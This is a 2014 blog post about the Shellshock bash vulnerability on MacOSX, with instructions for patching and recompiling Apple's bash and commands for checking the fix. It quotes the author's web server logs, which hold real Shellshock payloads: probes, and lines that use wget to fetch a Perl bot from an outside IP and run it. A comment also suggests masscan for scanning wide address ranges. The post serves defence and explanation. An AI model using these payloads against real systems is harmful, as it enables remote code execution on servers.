Skip to the Main Content

Note:These pages make extensive use of the latest XHTML and CSS Standards. They ought to look great in any standards-compliant modern browser. Unfortunately, they will probably look horrible in older browsers, like Netscape 4.x and IE 4.x. Moreover, many posts use MathML, which is, currently only supported in Mozilla. My best suggestion (and you will thank me when surfing an ever-increasing number of sites on the web which have been crafted to use the new standards) is to upgrade to the latest version of your browser. If that's not possible, consider moving to the Standards-compliant and open-source Mozilla browser.

September 27, 2014

Shellshock and MacOSX

Most Linux Distros have released patches for the recently-discovered “Shellshock” bug in /bin/bash. Apple has not, despite the fact that it uses bash as the default system shell (/bin/sh).

If you are running a webserver, you are vulnerable. Even if you avoid the obvious pitfall of writing CGI scripts as shellscripts, you are still vulnerable if one of your Perl (or PHP) scripts calls out to system(). Even Phusion Passenger is vulnerable. And, yes, this vulnerability is being actively exploited on the Web.

internetsurvey-3.erratasec.com - - [24/Sep/2014:20:35:04 -0500] "GET / HTTP/1.0" 301 402 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-" - - -
hosted-by.snel.com - - [25/Sep/2014:02:50:59 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" "-" - - -
census1.shodan.io - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" "-" - - -
ec2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [25/Sep/2014:20:05:01 -0500] "GET / HTTP/1.1" 301 379 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php5 HTTP/1.0" 301 391 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php HTTP/1.0" 301 390 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 301 395 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /test HTTP/1.0" 301 383 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" -  -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php HTTP/1.0" 404 359 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php5 HTTP/1.0" 404 360 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 364 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /test HTTP/1.0" 404 352 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:29 -0500] "GET / HTTP/1.1" 301 385 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:30 -0500] "GET / HTTP/1.1" 200 155 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:21 -0500] "GET /category/2007/07/making_adscft_precise.html%0A HTTP/1.1" 301 431 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:23 -0500] "GET /category/2007/07/making_adscft_precise.html%0D%0A HTTP/1.1" 301 434 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:24 -0500] "GET /category/2007/07/making_adscft_precise.html%0d%0a HTTP/1.1" 404 393 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:33 -0500] "GET /category/2007/07/making_adscft_precise.html%0a HTTP/1.1" 404 392 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:41 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0A HTTP/1.1" 301 439 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:44 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0a HTTP/1.1" 404 400 "-" "() { :;}; echo -e 'detector'" "-" - - -

Some of these look like harmless probes; others (like the one which tries to download and run an IRCbot on your machine) less so.

If you’re not running a webserver, the danger is less clear. There are persistent (but apparently incorrect) rumours that Apple’s DHCP client may be vulnerable. If true, then your iPhone could easily be pwned by a rogue DHCP server (running on someone’s laptop) at Starbucks.

I don’t know what to do about your iPhone, but at least you can patch your MacOSX machine yourself.

The following instructions (adapted from this blog post) are for MacOSX 10.9 (Mavericks). The idea is to download Apple’s source code for bash, patch it using the official bash patches, and recompile. If you are running an earlier version of MacOSX, you’ll have to download the appropriate package from Apple and use the corresponding patches for bash. Of course, you’ll need XCode, which is free from the App Store.

Fire up Terminal.app and do

mkdir bash
cd bash/
curl -O https://opensource.apple.com/tarballs/bash/bash-92.tar.gz
tar xzf bash-92.tar.gz
cd bash-92/bash-3.2/
curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052 | patch -p0
curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-053 | patch -p0
curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-054 | patch -p0
cd ..
xcodebuild
sudo cp /bin/bash /bin/bash.vulnerable
sudo cp /bin/sh /bin/sh.vulnerable
sudo chmod 0000 /bin/*.vulnerable
sudo cp build/Release/bash build/Release/sh /bin/

Now you can try (in a new shell)

echo $BASH_VERSION

which should yield

3.2.54(1)-release

Similarly,

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

should yield

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

and

env X='() { (a)=>\' sh -c "echo date"; cat echo

should yield

sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
date
cat: echo: No such file or directory

Approach these instructions with some caution.

  • You absolutely need a working version of /bin/sh for your system to function.
  • If you have a bunch of machines to update (as I did), you may be better-off copying the new versions of bash and sh onto a thumb drive and using that to update your other machines.

Update (9/28/2014):

Apple has issued a statement to the effect that ordinary client systems are not remote-exploitable. At least as far as DHCP goes, that seems to be the case. The DHCP client functionality is implemented by the IPConfiguration agent, run by configd; no shellscripts are involved (unlike, say, under Linux). There are other subsystems to worry about (CUPS, SNMP, …), even on “client” systems. But I think I’ll give Apple the benefit of the doubt on that score.

Update (9/29/2014):

Apple has finally issued Bash patches for Mavericks, Mountain Lion and Lion. Oddly, these only bring Bash up to 3.2.53, rather than 3.2.54 (which is the latest, and hopefully final, iteration defanging the Shellshock attack).
Posted by distler at September 27, 2014 12:58 PM

TrackBack URL for this Entry:   https://golem.ph.utexas.edu/cgi-bin/MT-3.0/dxy-tb.fcgi/2769

2 Comments & 0 Trackbacks

Re: Shellshock and MacOSX

It’s incredible how many vulnerabilities made headlines this past year alone. On a related note, Comodo is doing some awesome things for the internet security space. A friend of mine who works there recently showed me one of their patented technologies which automatically sandboxes everything on the fly, and lets files which are clear of any malicious intent out. It’s called containment, you’ll probably like their approach.

Posted by: ThinkCode on February 19, 2015 7:32 PM | Permalink | Reply to this

Re: Shellshock and MacOSX

If anyone is interested there is a tool called “masscan” that lets you quickly scan a big range of IP ranges for vulnerabilities like this. And I guess you could also do it with nmap, but it’s not optimized to scan a large amount of host efficiently (tip: disabling dns resolution helps a lot for scanning speed).

Posted by: jesus on February 20, 2015 9:00 PM | Permalink | Reply to this

Post a New Comment